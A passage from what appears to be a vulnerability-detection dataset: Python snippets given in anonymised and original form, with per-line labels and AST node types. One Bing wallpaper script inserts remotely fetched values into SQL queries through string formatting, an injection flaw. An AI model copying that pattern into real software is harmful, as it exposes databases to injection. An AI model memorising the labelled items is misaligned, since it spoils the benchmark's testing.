"Expr'",
"For",
"Assign'",
"Return'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_16(self, VAR_21):...\n",
"for i, VAR_18 in enumerate(list(self._handlers)):\n",
"VAR_40, VAR_41, VAR_41 = VAR_18\n",
"self._received.append(VAR_21)\n",
"VAR_42 = VAR_40(VAR_21)\n",
"VAR_21, VAR_42 = VAR_42\n",
"if VAR_42:\n",
"self._handlers.remove(VAR_18)\n"
] | [
"def _receive_message(self, msg):...\n",
"for i, handler in enumerate(list(self._handlers)):\n",
"handle_message, _, _ = handler\n",
"self._received.append(msg)\n",
"handled = handle_message(msg)\n",
"msg, handled = handled\n",
"if handled:\n",
"self._handlers.remove(handler)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'"
] |
[
"import logging\n",
"from google.appengine.api import users\n",
"from google.appengine.ext import ndb\n",
"from gae_libs.handlers.base_handler import BaseHandler\n",
"from gae_libs.handlers.base_handler import Permission\n",
"from gae_libs.http import auth_util\n",
"from libs import analysis_status\n",
"from libs import time_util\n",
"from model import triage_status\n",
"from model.flake.flake_analysis_request import FlakeAnalysisRequest\n",
"from model.flake.flake_try_job import FlakeTryJob\n",
"from model.flake.flake_try_job_data import FlakeTryJobData\n",
"from model.flake.master_flake_analysis import MasterFlakeAnalysis\n",
"from waterfall import buildbot\n",
"from waterfall.flake import flake_analysis_service\n",
"from waterfall.flake import triggering_sources\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK_EXCEPTION\n",
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_0.suspected_flake_build_number is None:\n",
"return {}\n",
"VAR_2 = VAR_0.GetDataPointOfSuspectedBuild()\n",
"assert VAR_2\n",
"return {'confidence': VAR_0.confidence_in_suspected_build, 'build_number':\n VAR_0.suspected_flake_build_number, 'commit_position': VAR_2.\n commit_position, 'git_hash': VAR_2.git_hash,\n 'lower_bound_commit_position': VAR_2.previous_build_commit_position,\n 'lower_bound_git_hash': VAR_2.previous_build_git_hash, 'triage_result':\n VAR_0.triage_history[-1].triage_result if VAR_0.triage_history else\n triage_status.UNTRIAGED}\n"
] | [
"import logging\n",
"from google.appengine.api import users\n",
"from google.appengine.ext import ndb\n",
"from gae_libs.handlers.base_handler import BaseHandler\n",
"from gae_libs.handlers.base_handler import Permission\n",
"from gae_libs.http import auth_util\n",
"from libs import analysis_status\n",
"from libs import time_util\n",
"from model import triage_status\n",
"from model.flake.flake_analysis_request import FlakeAnalysisRequest\n",
"from model.flake.flake_try_job import FlakeTryJob\n",
"from model.flake.flake_try_job_data import FlakeTryJobData\n",
"from model.flake.master_flake_analysis import MasterFlakeAnalysis\n",
"from waterfall import buildbot\n",
"from waterfall.flake import flake_analysis_service\n",
"from waterfall.flake import triggering_sources\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK_EXCEPTION\n",
"def _GetSuspectedFlakeInfo(analysis):...\n",
"\"\"\"docstring\"\"\"\n",
"if analysis.suspected_flake_build_number is None:\n",
"return {}\n",
"data_point = analysis.GetDataPointOfSuspectedBuild()\n",
"assert data_point\n",
"return {'confidence': analysis.confidence_in_suspected_build,\n 'build_number': analysis.suspected_flake_build_number,\n 'commit_position': data_point.commit_position, 'git_hash': data_point.\n git_hash, 'lower_bound_commit_position': data_point.\n previous_build_commit_position, 'lower_bound_git_hash': data_point.\n previous_build_git_hash, 'triage_result': analysis.triage_history[-1].\n triage_result if analysis.triage_history else triage_status.UNTRIAGED}\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
5,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Assert'",
"Return'"
] |
[
"def __getstate__(self):...\n",
"return self.serialize()\n"
] | [
"def __getstate__(self):...\n",
"return self.serialize()\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_1(self):...\n",
"for VAR_7 in self.targets:\n",
"self.schedule(self.add_comment, (VAR_7, self.msgfun()))\n",
"if len(self.targets) == 0:\n",
"self.schedule(self.scan_targets_loop)\n",
"self.schedule(self.comment_loop)\n"
] | [
"def comment_loop(self):...\n",
"for t in self.targets:\n",
"self.schedule(self.add_comment, (t, self.msgfun()))\n",
"if len(self.targets) == 0:\n",
"self.schedule(self.scan_targets_loop)\n",
"self.schedule(self.comment_loop)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Expr'",
"Condition",
"Expr'",
"Expr'"
] |
[
"def FUNC_2(VAR_6, VAR_8=1):...\n",
"VAR_35 = dateutil_parse(VAR_6, ignoretz=True).replace(microsecond=0)\n",
"return VAR_35 - timedelta(seconds=(dt - dt.min).seconds % alignment)\n"
] | [
"def parse_datetime(value, alignment=1):...\n",
"dt = dateutil_parse(value, ignoretz=True).replace(microsecond=0)\n",
"return dt - timedelta(seconds=(dt - dt.min).seconds % alignment)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_8():...\n",
"VAR_10 = get_executing_test()\n",
"VAR_5 = VAR_10.spynner_browser\n",
"if VAR_5:\n",
"VAR_10.spynner_browser = None\n",
"VAR_5.close()\n"
] | [
"def stop_spynner_browser():...\n",
"test = get_executing_test()\n",
"browser = test.spynner_browser\n",
"if browser:\n",
"test.spynner_browser = None\n",
"browser.close()\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'"
] |
[
"def FUNC_7(self):...\n",
"VAR_1 = '/api/apps'\n",
"VAR_2 = self.client.post(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_3 = VAR_2.data['id']\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_4 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 2)\n",
"VAR_1 = '/api/apps/{app_id}/releases'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 2)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 1)\n",
"chaos.CREATE_ERROR_RATE = 1\n",
"VAR_1 = '/api/apps/{app_id}/run'.format(**locals())\n",
"VAR_4 = {'command': 'ls -al'}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 503)\n"
] | [
"def test_run_chaos(self):...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 2)\n",
"url = '/api/apps/{app_id}/releases'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 2)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"chaos.CREATE_ERROR_RATE = 1\n",
"url = '/api/apps/{app_id}/run'.format(**locals())\n",
"body = {'command': 'ls -al'}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 503)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_6(self, VAR_26):...\n",
"if VAR_26:\n",
"VAR_106 = int(VAR_26, 36)\n",
"abort(404, 'page not found')\n",
"return Message._byID(VAR_106, True)\n"
] | [
"def run(self, message_id):...\n",
"if message_id:\n",
"aid = int(message_id, 36)\n",
"abort(404, 'page not found')\n",
"return Message._byID(aid, True)\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Expr'",
"Return'"
] |
[
"@odin.map_list_field(to_field='array_string')...\n",
"return VAR_47.split(',')\n"
] | [
"@odin.map_list_field(to_field='array_string')...\n",
"return value.split(',')\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"@app.route('/api/settings', methods=['PUT'])...\n",
"controller.settings.update(VAR_3)\n",
"VAR_13 = controller.settings.to_map()\n",
"return dict([setting for setting in VAR_13.items() if setting[0] in VAR_3])\n"
] | [
"@app.route('/api/settings', methods=['PUT'])...\n",
"controller.settings.update(json)\n",
"updated_settings = controller.settings.to_map()\n",
"return dict([setting for setting in updated_settings.items() if setting[0] in\n json])\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Expr'",
"Assign'",
"Return'"
] |
[
"@eqlx.with_timeout...\n",
"time.sleep(1)\n"
] | [
"@eqlx.with_timeout...\n",
"time.sleep(1)\n"
] | [
0,
0
] | [
"Condition",
"Expr'"
] |
[
"def FUNC_14(self):...\n",
"VAR_5 = None\n",
"VAR_5 = tempfile.NamedTemporaryFile(delete=False)\n",
"if VAR_5:\n",
"VAR_5.close()\n",
"os.remove(VAR_5.name)\n",
"self._mox.StubOutWithMock(url_helper, 'UrlOpen')\n",
"VAR_12 = 'data'\n",
"url_helper.UrlOpen(mox.IgnoreArg(), method='GET').AndReturn(VAR_12)\n",
"self._mox.ReplayAll()\n",
"self.assertTrue(url_helper.DownloadFile(VAR_5.name, 'http://www.fakeurl.com'))\n",
"self.assertEqual(VAR_12, f.read())\n",
"self._mox.VerifyAll()\n"
] | [
"def testDownloadFile(self):...\n",
"local_file = None\n",
"local_file = tempfile.NamedTemporaryFile(delete=False)\n",
"if local_file:\n",
"local_file.close()\n",
"os.remove(local_file.name)\n",
"self._mox.StubOutWithMock(url_helper, 'UrlOpen')\n",
"file_data = 'data'\n",
"url_helper.UrlOpen(mox.IgnoreArg(), method='GET').AndReturn(file_data)\n",
"self._mox.ReplayAll()\n",
"self.assertTrue(url_helper.DownloadFile(local_file.name,\n 'http://www.fakeurl.com'))\n",
"self.assertEqual(file_data, f.read())\n",
"self._mox.VerifyAll()\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_4(self):...\n",
"if self._user_notified_about_crash or self._IsServerAlive():\n",
"return\n",
"self._user_notified_about_crash = True\n",
"if self._server_stderr:\n",
"VAR_27 = ''.join(server_stderr_file.readlines()[:-VAR_1])\n",
"vimsupport.PostVimMessage(VAR_3)\n",
"vimsupport.PostMultiLineNotice(VAR_2 + VAR_27)\n"
] | [
"def _NotifyUserIfServerCrashed(self):...\n",
"if self._user_notified_about_crash or self._IsServerAlive():\n",
"return\n",
"self._user_notified_about_crash = True\n",
"if self._server_stderr:\n",
"error_output = ''.join(server_stderr_file.readlines()[:-\n NUM_YCMD_STDERR_LINES_ON_CRASH])\n",
"vimsupport.PostVimMessage(SERVER_CRASH_MESSAGE_SAME_STDERR)\n",
"vimsupport.PostMultiLineNotice(SERVER_CRASH_MESSAGE_STDERR_FILE + error_output)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_6(self):...\n",
""
] | [
"def book_ride(self):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"VAR_1 = '/api/apps'\n",
"VAR_2 = self.client.post(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_3 = VAR_2.data['id']\n",
"VAR_1 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_4 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 201)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 1)\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 20}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 204)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"self.assertEqual(len(VAR_2.data['results']), 20)\n",
"chaos.DESTROY_ERROR_RATE = 0.5\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 0}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_2.status_code, 503)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"VAR_5 = set([c['state'] for c in VAR_2.data['results']])\n",
"self.assertEqual(VAR_5, set(['error']))\n",
"VAR_6 = 20\n",
"for _ in range(100):\n",
"VAR_1 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_4 = {'web': 0}\n",
"VAR_2 = self.client.post(VAR_1, json.dumps(VAR_4), content_type=\n 'application/json')\n",
"if VAR_2.status_code == 204:\n",
"self.assertEquals(VAR_2.status_code, 503)\n",
"VAR_1 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_2 = self.client.get(VAR_1)\n",
"self.assertEqual(VAR_2.status_code, 200)\n",
"VAR_6 = len(VAR_2.data['results'])\n"
] | [
"def test_destroy_chaos(self):...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 20}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 204)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 20)\n",
"chaos.DESTROY_ERROR_RATE = 0.5\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 0}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 503)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"states = set([c['state'] for c in response.data['results']])\n",
"self.assertEqual(states, set(['error']))\n",
"containers = 20\n",
"for _ in range(100):\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 0}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"if response.status_code == 204:\n",
"self.assertEquals(response.status_code, 503)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"containers = len(response.data['results'])\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"For",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"@utils.synchronized('3par', external=True)...\n",
""
] | [
"@utils.synchronized('3par', external=True)...\n",
""
] | [
0,
0
] | [
"Condition",
"Condition"
] |
[
"def FUNC_4(self):...\n",
"self._tab_after('s')\n",
"eq_(self.terminal.method_calls, [('write', ('et ',), {})])\n"
] | [
"def test_command_completion(self):...\n",
"self._tab_after('s')\n",
"eq_(self.terminal.method_calls, [('write', ('et ',), {})])\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_38(VAR_65, VAR_66):...\n",
"VAR_79 = ElementTree.parse(VAR_66).getroot()\n",
"if VAR_79.tag != 'plugin':\n",
"return VAR_79.find('name').text\n"
] | [
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"def process_info_file(cp_elem, info_file):...\n",
"plugin_info = ElementTree.parse(info_file).getroot()\n",
"if plugin_info.tag != 'plugin':\n",
"return plugin_info.find('name').text\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"FunctionDef'",
"Assign'",
"Condition",
"Return'"
] |
[
"\"\"\"This module contains the device class and context manager\"\"\"\n",
"import abc\n",
"import logging\n",
"logging.getLogger()\n",
"\"\"\"string\"\"\"\n",
"def __getattr__(VAR_0, VAR_1):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_7(*VAR_15, **VAR_16):...\n",
"\"\"\"docstring\"\"\"\n",
"return VAR_0(VAR_1, *VAR_15, **kwargs)\n"
] | [
"\"\"\"This module contains the device class and context manager\"\"\"\n",
"import abc\n",
"import logging\n",
"logging.getLogger()\n",
"\"\"\"Metaclass that allows derived classes to dynamically instantiate\n new objects based on undefined methods. The dynamic methods pass their arguments\n directly to __init__ of the inheriting class.\"\"\"\n",
"def __getattr__(cls, name):...\n",
"\"\"\"docstring\"\"\"\n",
"def new_object(*args, **kwargs):...\n",
"\"\"\"docstring\"\"\"\n",
"return cls(name, *args, **kwargs)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"from binance.client import Client\n",
"import configparser\n",
"import sqlite3\n",
"def FUNC_0(VAR_0, VAR_1=',', VAR_2=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return [chunk.strip(VAR_2) for chunk in VAR_0.split(VAR_1)]\n"
] | [
"from binance.client import Client\n",
"import configparser\n",
"import sqlite3\n",
"def getlist(option, sep=',', chars=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return [chunk.strip(chars) for chunk in option.split(sep)]\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"Import'",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self, VAR_2, VAR_3, VAR_4, *VAR_5):...\n",
"self.write_data({'type': 'torrent_discovered', 'event': VAR_5[0]})\n"
] | [
"def on_torrent_discovered(self, subject, changetype, objectID, *args):...\n",
"self.write_data({'type': 'torrent_discovered', 'event': args[0]})\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_8():...\n",
"VAR_12 = {}\n",
"VAR_13 = request.authorization\n",
"VAR_14 = request.headers\n",
"if VAR_13 and VAR_13.get('username'):\n",
"if not VAR_13.get('password'):\n",
"if 'X-Auth-Token' in VAR_14 and 'X-Auth-From' in VAR_14:\n",
"VAR_12['version'], VAR_12['user_type'], VAR_12['from'] = FUNC_7(VAR_13[\n 'username'])\n",
"if not VAR_14.get('X-Auth-Token'):\n",
"return VAR_12\n",
"VAR_12['token'] = VAR_13['password']\n",
"VAR_12['version'], VAR_12['user_type'], VAR_12['from'] = FUNC_7(VAR_14[\n 'X-Auth-From'])\n",
"VAR_12['token'] = VAR_14['X-Auth-Token']\n"
] | [
"def _get_kms_auth_data():...\n",
"data = {}\n",
"auth = request.authorization\n",
"headers = request.headers\n",
"if auth and auth.get('username'):\n",
"if not auth.get('password'):\n",
"if 'X-Auth-Token' in headers and 'X-Auth-From' in headers:\n",
"data['version'], data['user_type'], data['from'] = _parse_username(auth[\n 'username'])\n",
"if not headers.get('X-Auth-Token'):\n",
"return data\n",
"data['token'] = auth['password']\n",
"data['version'], data['user_type'], data['from'] = _parse_username(headers[\n 'X-Auth-From'])\n",
"data['token'] = headers['X-Auth-Token']\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Condition",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._unit_of_measurement\n"
] | [
"@property...\n",
"\"\"\"docstring\"\"\"\n",
"return self._unit_of_measurement\n"
] | [
0,
0,
0
] | [
"Condition",
"Docstring",
"Return'"
] |
[
"import sys\n",
"import os\n",
"import sqlite3\n",
"import requests\n",
"from PIL import Image\n",
"from io import BytesIO\n",
"from configs import *\n",
"VAR_0 = 10\n",
"def FUNC_0():...\n",
"if len(sys.argv) > 1:\n",
"VAR_0 = int(sys.argv[1])\n",
"if sys.version_info.major < 3:\n",
"print('This script only runs in python3')\n",
"VAR_1 = './data'\n",
"return\n",
"if not os.path.isdir(VAR_1):\n",
"os.makedirs(VAR_1)\n",
"VAR_2 = os.path.join(VAR_1, '{}_{}'.format(resolution_width, resolution_height)\n )\n",
"if not os.path.isdir(VAR_1):\n",
"if not os.path.isdir(VAR_2):\n",
"print(\"Failed to create data path '{}'\".format(VAR_1))\n",
"os.makedirs(VAR_2)\n",
"VAR_3 = sqlite3.connect('./data/data.db')\n",
"return\n",
"if not os.path.isdir(VAR_2):\n",
"VAR_4 = VAR_3.cursor()\n",
"print(\"Failed to create image path '{}'\".format(VAR_2))\n",
"VAR_4.execute(\n \"\"\"\n select name from sqlite_master\n where type='table' and name='wallpapers'\n \"\"\"\n )\n",
"return\n",
"if VAR_4.fetchone() == None:\n",
"VAR_4.execute('string')\n",
"VAR_5 = 0\n",
"while VAR_5 <= VAR_0:\n",
"VAR_6 = (\n 'https://www.bing.com/HPImageArchive.aspx?format=js&idx={}&n=1&mkt=en-US'\n .format(VAR_5))\n",
"VAR_3.commit()\n",
"print(\"Getting iamge list from '{}'\".format(VAR_6))\n",
"VAR_4.close()\n",
"VAR_7 = requests.get(VAR_6)\n",
"VAR_3.close()\n",
"if VAR_7.status_code != requests.codes.ok:\n",
"if __name__ == '__main__':\n",
"print(\"Failed to get url '{}'\".format(VAR_6))\n",
"VAR_8 = VAR_7.json()\n",
"FUNC_0()\n",
"VAR_9 = VAR_8['images'][0]['startdate']\n",
"VAR_10 = VAR_8['images'][0]['urlbase']\n",
"VAR_11 = VAR_8['images'][0]['url']\n",
"VAR_12 = VAR_8['images'][0]['copyright']\n",
"VAR_4.execute(\n \"\"\"\n select * from wallpapers\n where image_date='{}'\n \"\"\"\n .format(VAR_9))\n",
"if VAR_4.fetchone() == None:\n",
"VAR_4.execute('string'.format(VAR_9, VAR_10, VAR_12))\n",
"VAR_13 = os.path.join(VAR_2, '{}.jpg'.format(VAR_9))\n",
"print('## Inserted image {} to database ##'.format(VAR_9))\n",
"if not os.path.isfile(VAR_13):\n",
"VAR_14 = 'https://www.bing.com{}_{}x{}.jpg'.format(VAR_10, resolution_width,\n resolution_height)\n",
"VAR_5 += 1\n",
"print(\"## Downloading image from '{}'\".format(VAR_14))\n",
"VAR_15 = requests.get(VAR_14)\n",
"if VAR_15.status_code != requests.codes.ok:\n",
"print(\"Failed to get url '{}'\".format(VAR_14))\n",
"VAR_16 = Image.open(BytesIO(VAR_15.content))\n",
"VAR_16.save(VAR_13)\n",
"print('## Downloaded image {} ##'.format(VAR_13))\n"
] | [
"import sys\n",
"import os\n",
"import sqlite3\n",
"import requests\n",
"from PIL import Image\n",
"from io import BytesIO\n",
"from configs import *\n",
"NUM_IMAGES_TO_GET = 10\n",
"def main():...\n",
"if len(sys.argv) > 1:\n",
"NUM_IMAGES_TO_GET = int(sys.argv[1])\n",
"if sys.version_info.major < 3:\n",
"print('This script only runs in python3')\n",
"data_dir = './data'\n",
"return\n",
"if not os.path.isdir(data_dir):\n",
"os.makedirs(data_dir)\n",
"image_dir = os.path.join(data_dir, '{}_{}'.format(resolution_width,\n resolution_height))\n",
"if not os.path.isdir(data_dir):\n",
"if not os.path.isdir(image_dir):\n",
"print(\"Failed to create data path '{}'\".format(data_dir))\n",
"os.makedirs(image_dir)\n",
"conn = sqlite3.connect('./data/data.db')\n",
"return\n",
"if not os.path.isdir(image_dir):\n",
"c = conn.cursor()\n",
"print(\"Failed to create image path '{}'\".format(image_dir))\n",
"c.execute(\n \"\"\"\n select name from sqlite_master\n where type='table' and name='wallpapers'\n \"\"\"\n )\n",
"return\n",
"if c.fetchone() == None:\n",
"c.execute(\n \"\"\"\n create table wallpapers (\n id integer primary key autoincrement not null,\n image_date text not null,\n url_base text not null,\n copyright text not null)\n \"\"\"\n )\n",
"idx = 0\n",
"while idx <= NUM_IMAGES_TO_GET:\n",
"list_url = (\n 'https://www.bing.com/HPImageArchive.aspx?format=js&idx={}&n=1&mkt=en-US'\n .format(idx))\n",
"conn.commit()\n",
"print(\"Getting iamge list from '{}'\".format(list_url))\n",
"c.close()\n",
"r = requests.get(list_url)\n",
"conn.close()\n",
"if r.status_code != requests.codes.ok:\n",
"if __name__ == '__main__':\n",
"print(\"Failed to get url '{}'\".format(list_url))\n",
"j = r.json()\n",
"main()\n",
"image_date = j['images'][0]['startdate']\n",
"url_base = j['images'][0]['urlbase']\n",
"url = j['images'][0]['url']\n",
"copyright = j['images'][0]['copyright']\n",
"c.execute(\n \"\"\"\n select * from wallpapers\n where image_date='{}'\n \"\"\"\n .format(image_date))\n",
"if c.fetchone() == None:\n",
"c.execute(\n \"\"\"\n insert into wallpapers (image_date, url_base, copyright)\n values ('{}', '{}', '{}')\n \"\"\"\n .format(image_date, url_base, copyright))\n",
"image_path = os.path.join(image_dir, '{}.jpg'.format(image_date))\n",
"print('## Inserted image {} to database ##'.format(image_date))\n",
"if not os.path.isfile(image_path):\n",
"image_url = 'https://www.bing.com{}_{}x{}.jpg'.format(url_base,\n resolution_width, resolution_height)\n",
"idx += 1\n",
"print(\"## Downloading image from '{}'\".format(image_url))\n",
"r_image = requests.get(image_url)\n",
"if r_image.status_code != requests.codes.ok:\n",
"print(\"Failed to get url '{}'\".format(image_url))\n",
"image = Image.open(BytesIO(r_image.content))\n",
"image.save(image_path)\n",
"print('## Downloaded image {} ##'.format(image_path))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
